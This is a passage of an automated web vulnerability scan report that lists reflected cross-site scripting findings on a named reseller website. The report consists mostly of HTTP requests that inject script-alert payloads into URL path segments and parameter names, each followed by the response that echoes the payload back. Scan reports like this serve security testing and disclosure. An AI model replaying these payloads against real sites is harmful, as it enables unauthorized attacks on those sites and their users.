The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a8eef<script>alert(1)</script>380db4fcc77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themesa8eef<script>alert(1)</script>380db4fcc77/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themesa8eef<script>alert(1)</script>380db4fcc77/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3209. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d9a73<script>alert(1)</script>d8061678f88 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmosd9a73<script>alert(1)</script>d8061678f88/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmosd9a73<script>alert(1)</script>d8061678f88/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3210. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 10f00<script>alert(1)</script>4b74f3d7466 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images10f00<script>alert(1)</script>4b74f3d7466/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images10f00<script>alert(1)</script>4b74f3d7466/rating/ was not found on this server.</p>
...[SNIP]...

2.3211. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3cc51<script>alert(1)</script>094329493a5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating3cc51<script>alert(1)</script>094329493a5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating3cc51<script>alert(1)</script>094329493a5/ was not found on this server.</p>
...[SNIP]...

2.3212. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ecbb7<script>alert(1)</script>7c6ffb43c14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/?ecbb7<script>alert(1)</script>7c6ffb43c14=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/?ecbb7<script>alert(1)</script>7c6ffb43c14=1 was not found on this server.</p>
...[SNIP]...

2.3213. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 14c2d<script>alert(1)</script>0a3b1ab6c03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail14c2d<script>alert(1)</script>0a3b1ab6c03/45/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail14c2d<script>alert(1)</script>0a3b1ab6c03/45/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3214. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba2b3<script>alert(1)</script>b0d21166ad6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45ba2b3<script>alert(1)</script>b0d21166ad6/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45ba2b3<script>alert(1)</script>b0d21166ad6/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3215. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5372e<script>alert(1)</script>0da66f7f54d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes5372e<script>alert(1)</script>0da66f7f54d/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes5372e<script>alert(1)</script>0da66f7f54d/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3216. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2f828<script>alert(1)</script>3f876bafc39 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos2f828<script>alert(1)</script>3f876bafc39/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos2f828<script>alert(1)</script>3f876bafc39/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3217. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 63e63<script>alert(1)</script>968d68c0d9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images63e63<script>alert(1)</script>968d68c0d9d/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images63e63<script>alert(1)</script>968d68c0d9d/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3218. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 42936<script>alert(1)</script>dca18a01d42 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating42936<script>alert(1)</script>dca18a01d42/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating42936<script>alert(1)</script>dca18a01d42/3half.gif was not found on this server.</p>
...[SNIP]...

2.3219. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 83bf2<script>alert(1)</script>1f091db20b6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/3half.gif83bf2<script>alert(1)</script>1f091db20b6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/3half.gif83bf2<script>alert(1)</script>1f091db20b6 was not found on this server.</p>
...[SNIP]...

2.3220. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5556<script>alert(1)</script>6dfc677b76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/3half.gif?c5556<script>alert(1)</script>6dfc677b76=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/3half.gif?c5556<script>alert(1)</script>6dfc677b76=1 was not found on this server.</p>
...[SNIP]...

2.3221. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80153<script>alert(1)</script>58ffce940b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail80153<script>alert(1)</script>58ffce940b/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail80153<script>alert(1)</script>58ffce940b/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3222. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b29b9<script>alert(1)</script>2bf37bed641 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45b29b9<script>alert(1)</script>2bf37bed641/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45b29b9<script>alert(1)</script>2bf37bed641/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3223. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2f62<script>alert(1)</script>ff33b92b0a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themesc2f62<script>alert(1)</script>ff33b92b0a0/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themesc2f62<script>alert(1)</script>ff33b92b0a0/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3224. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9cca9<script>alert(1)</script>f29d711b862 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos9cca9<script>alert(1)</script>f29d711b862/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos9cca9<script>alert(1)</script>f29d711b862/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3225. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 26084<script>alert(1)</script>d28f90ad726 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images26084<script>alert(1)</script>d28f90ad726/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images26084<script>alert(1)</script>d28f90ad726/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3226. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6a812<script>alert(1)</script>76b2b24e5ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating6a812<script>alert(1)</script>76b2b24e5ac/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating6a812<script>alert(1)</script>76b2b24e5ac/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
